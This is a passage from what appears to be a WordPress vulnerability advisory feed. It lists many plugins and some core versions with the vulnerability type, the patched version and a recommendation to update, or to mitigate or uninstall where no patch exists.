Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Colorful Categories

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: Register IPs

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Hotel Listing

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: wp-smiley

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Import Deletion
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: StaffList

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Advanced Recent Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tiempo.com

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MapPress Maps for WordPress

Vulnerability: Admin+ File Upload to Remote Code Execution
Patched Version: 2.73.13
Recommended Action: Update to version 2.73.13, or a newer patched version

Plugin: Seos Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_delete_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: About Me 3000 widget

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Database Cleaner

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Team Manager – WordPress Showcase Team Members

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: White Label CMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Simple History – Track, Log, and Audit WordPress Changes

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: AI Power: Complete AI Pack

Vulnerability: Missing Authorization
Patched Version: 1.4.38
Recommended Action: Update to version 1.4.38, or a newer patched version

Plugin: Goodnews – Responsive WordPress News/Magazine | News / Editorial

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Verification / SMS Verification / OTP Verification / OTP Authentication / WooCommerce Notification

Vulnerability: Missing Authorization via dismiss_notice
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via title
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: ContentStudio

Vulnerability: Information Exposure
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Schreikasten

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broken Link Checker

Vulnerability: Authenticated (Admin+) PHAR Deserialization
Patched Version: 1.11.17
Recommended Action: Update to version 1.11.17, or a newer patched version

Core: WordPress

Vulnerability: Shortcode Execution in User Generated Content
Patched Version: 5.9.6
Recommended Action: Update to one of the following versions, or a newer patched version: 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Easy Accordion FAQ and Knowledge Base Software for WordPress

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: USM Premium

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 16.3
Recommended Action: Update to version 16.3, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting and Setting Changes
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Revive Social – Social Media Auto Post and Scheduling Automation Plugin

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 9.0.11
Recommended Action: Update to version 9.0.11, or a newer patched version

Plugin: WP TripAdvisor Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 10.8
Recommended Action: Update to version 10.8, or a newer patched version

Plugin: simply-poll

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: WPFront User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1.11184
Recommended Action: Update to version 3.2.1.11184, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Ldap WP Login / Active Directory Integration

Vulnerability: Missing Authorization
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.9.1
Recommended Action: Update to version 3.3.9.1, or a newer patched version

Plugin: µAudio Player

Vulnerability: Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: PHP Object Injection Gadget
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.8, 5.2.9, 5.3.6, 5.4.4, 5.5.3

Core: WordPress

Vulnerability: Cross-Site Scripting via Ephox in Plupload
Patched Version: 3.7.6
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.6, 3.8.6, 3.9.4, 4.0.2, 4.1.2

Plugin: Download Plugin

Vulnerability: Missing Authorization and Sensitive Information Exposure
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Super Cache

Vulnerability: PHP Object Injection
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: 1003 Mortgage Application

Vulnerability: Unauthenticated CSV Injection
Patched Version: 1.80
Recommended Action: Update to version 1.80, or a newer patched version

Plugin: Image Slider

Vulnerability: Cross-Site Request Forgery to Post Duplication
Patched Version: 1.1.123
Recommended Action: Update to version 1.1.123, or a newer patched version

Plugin: Amministrazione Trasparente

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 7.1.1
Recommended Action: Update to version 7.1.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting via Post Previews
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Restaurant Reservations

Vulnerability: SQL Injection
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Rocket Font

Vulnerability: Cross-Site Request Forgery via update_option_check_match_default
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Unauthenticated CSV Injection
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: MicroCopy

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media Library Assistant

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WPIDE – File Manager & Code Editor

Vulnerability: Authenticated (Administrator+) Arbitrary File Read
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: MojoPlug Slide Panel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager

Vulnerability: Sensitive Information Disclosure via Directory Listing
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Profile Creation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Responsive Zoom In/Out Slider WordPress Plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Simple Shopping Cart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Missing Authorization
Patched Version: 3.8.10
Recommended Action: Update to version 3.8.10, or a newer patched version

Plugin: Images to WebP

Vulnerability: Local File Inclusion
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Easy Post Types

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Admin Log

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Artillery (MASS EMAIL)

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yada Wiki

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Email Subscription Popup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Insufficient Authorization to Authenticated (Admin+) Arbitrary File Upload
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Catch Web Tools

Vulnerability: Missing Authorization
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: All in One Invite Codes

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Article Directory Redux

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Admin Access via Password Reset
Patched Version: 3.4.9
Recommended Action: Update to version 3.4.9, or a newer patched version

Plugin: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds

Vulnerability: Missing Authorization
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images – Lite

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Wp2android

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: InfiniteWP Client

Vulnerability: Authentication Bypass
Patched Version: 1.9.4.5
Recommended Action: Update to version 1.9.4.5, or a newer patched version

Plugin: Logaster Logo Generator

Vulnerability: Missing Authorization to Arbitrary Media Deletion and Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Coder – Code Snippets + HTML, CSS, JS and PHP Injection

Vulnerability: Remote File Inclusion leading to Remote Code Execution via Cross-Site Request Forgery
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 12.0.9
Recommended Action: Update to version 12.0.9, or a newer patched version

Plugin: Formidable PRO2PDF

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: Responsive Contact Form Builder & Lead Generation Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Protection Bypass of Renamed Login Page via URL Encoding
Patched Version: 5.2.5
Recommended Action: Update to version 5.2.5, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Authenticated (Admin+) Arbitrary OS File Access via Path Traversal
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Ordering
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Autoptimize

Vulnerability: Arbitrary File Upload (and Remote Code Execution) via Import Settings
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Arbitrary Post Deletion via Cross-Site Request Forgery
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Contact Form DB

Vulnerability: Cross-Site Request Forgery via a request in the CF7DBPluginSubmissions page to wp-admin/admin.php
Patched Version: 2.8.32
Recommended Action: Update to version 2.8.32, or a newer patched version

Plugin: Task Manager Pro – Task Management Plugin For WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Test Email Sending
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: CRM WordPress Plugin – RepairBuddy

Vulnerability: SQL Injection
Patched Version: 3.73
Recommended Action: Update to version 3.73, or a newer patched version

Plugin: Csomagpontok és Címkék WooCommerce-hez

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.0.3
Recommended Action: Update to version 1.9.0.3, or a newer patched version

Plugin: WooCommerce Address Book

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: GD bbPress Attachments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Exchange Addon Invoices

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘Feed[title]’
Patched Version: 10.2.4
Recommended Action: Update to version 10.2.4, or a newer patched version

Plugin: PDF Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: embed-articles

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Lite <= 1.5.5
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Insufficient Authorization on Multiple AJAX Actions
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Edwiser Bridge – WordPress Moodle LMS Integration

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Photospace Responsive Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Missing Authorization
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Plugin: Schema Pro

Vulnerability: Authenticated (Contributor+) Missing Authorization
Patched Version: 2.7.9
Recommended Action: Update to version 2.7.9, or a newer patched version

Plugin: Quards

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photoswipe Masonry Gallery

Vulnerability: No subtitle
Patched Version: 1.2.15
Recommended Action: Update to version 1.2.15, or a newer patched version

Plugin: Blog Designer – Post and Widget

Vulnerability: Post and Widget <= 2.3
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: FancyBox for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Exclusive Addons for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Dropbox Folder Share

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSVPMaker

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 10.6.7
Recommended Action: Update to version 10.6.7, or a newer patched version

Plugin: LoginWP (Formerly Peter's Login Redirect)

Vulnerability: Reflected Cross-Site Scripting via rul_login_url, rul_logout_url Parameter
Patched Version: 3.0.0.5
Recommended Action: Update to version 3.0.0.5, or a newer patched version

Plugin: WP AmASIN – The Amazon Affiliate Shop

Vulnerability: Local File Inclusion
Patched Version: 0.9.7
Recommended Action: Update to version 0.9.7, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Import WooCommerce Suite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.9.97.21
Recommended Action: Update to version 0.9.97.21, or a newer patched version

Plugin: CTX Feed – WooCommerce Product Feed Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.15
Recommended Action: Update to version 3.1.15, or a newer patched version

Plugin: Bulk Creator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Sorter

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Cross-Site Scripting
Patched Version: 3.9.9
Recommended Action: Update to version 3.9.9, or a newer patched version

Plugin: Recent Posts Widget Extended

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.9.4
Recommended Action: Update to version 0.9.9.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.11
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.11, 2.2.2

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Unprotected AJAX including Privilege Escalation
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: User Activity Log

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Import
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: TinyChat Room Spy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.24
Recommended Action: Update to version 3.9.24, or a newer patched version

Plugin: Real Testimonials – Testimonial Slider, Carousel, Grid | Collect Customer Reviews and Video Testimonial with Testimonial Form | Social Proof Reviews and Review Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Information Reel

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 10.1
Recommended Action: Update to version 10.1, or a newer patched version

Plugin: BadgeOS

Vulnerability: Missing Authorization in delete_badgeos_log_entries
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Unauthenticated SQL Injection via Multiple Parameters
Patched Version: 1.0.73
Recommended Action: Update to version 1.0.73, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: SQL Injection
Patched Version: 6.90
Recommended Action: Update to version 6.90, or a newer patched version

Plugin: W4 Post List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Options
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Constant Contact Forms

Vulnerability: No subtitle
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: RSFirewall!

Vulnerability: IP Address Spoofing
Patched Version: 1.1.25
Recommended Action: Update to version 1.1.25, or a newer patched version

Core: WordPress

Vulnerability: Incorrect Authorization Checks
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors

Vulnerability: Authenticated (Shop manager+) SQL Injection via search dates
Patched Version: 2.4.7.1
Recommended Action: Update to version 2.4.7.1, or a newer patched version

Plugin: Lightbox Photo Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Sharing Plugin – Sassy Social Share

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.40
Recommended Action: Update to version 3.3.40, or a newer patched version

Plugin: XML Sitemap Generator for Google

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WordPress Events Calendar Plugin – connectDaily

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Booking Package

Vulnerability: Authorization Bypass to Arbitrary Password Reset
Patched Version: 1.5.99
Recommended Action: Update to version 1.5.99, or a newer patched version

Plugin: Wallet for WooCommerce

Vulnerability: Cross-Site Request Forgery via lock_unlock_terawallet
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WP Fusion Lite – Marketing Automation and CRM Integration for WordPress

Vulnerability: No subtitle
Patched Version: 3.37.30
Recommended Action: Update to version 3.37.30, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices, packing slips and more

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.102
Recommended Action: Update to version 1.2.102, or a newer patched version

Plugin: Weblizar Pin It Button On Image Hover And Post

Vulnerability: Authorization Bypass
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Audio

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Profile Picture

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Unauthenticated Arbitrary Ticket Deletion
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.16
Recommended Action: Update to version 2.1.16, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.68
Recommended Action: Update to version 1.5.68, or a newer patched version

Core: WordPress

Vulnerability: XXE Injection
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Missing Authorization to Contributor+ Form Submission Export
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: ClickFunnels

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Facebook for WooCommerce

Vulnerability: Cross-Site Request Forgery allowing Option Update
Patched Version: 1.9.15
